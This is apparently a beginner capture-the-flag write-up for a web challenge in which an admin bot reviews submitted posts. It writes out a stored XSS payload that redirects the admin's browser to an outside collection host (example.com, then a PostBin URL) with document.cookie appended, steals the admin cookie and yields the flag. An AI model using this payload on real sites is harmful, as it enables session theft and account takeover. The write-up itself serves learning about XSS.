- TASK : WEB
- TYPE : Beginners
Started with the URL , got from the description . The link going to a webpage titled as Ministry of Agriculture with some images and a form that allows us to create a post . When submitting the post, webpage response is Your post was submitted for review. Administator will take a look shortly.
So admin is alive :)
When the admin link checks it's redirect to home [ location="/"
]
THEN CHECK THE FORM
- I had used a XSS trick , It execute an attack to steal cookies from admin.
<script>
location.href = 'example.com?c00k13='+document.cookie;
</script>
- I had used PostBin as href link
- Then the final payload looks like
<script>
location.href = 'https://postb.in/1561447806433-7096075240988?c00k13='+document.cookie;
</script>
- After submitting the post
- Then got response from server
- Finally found our FL4G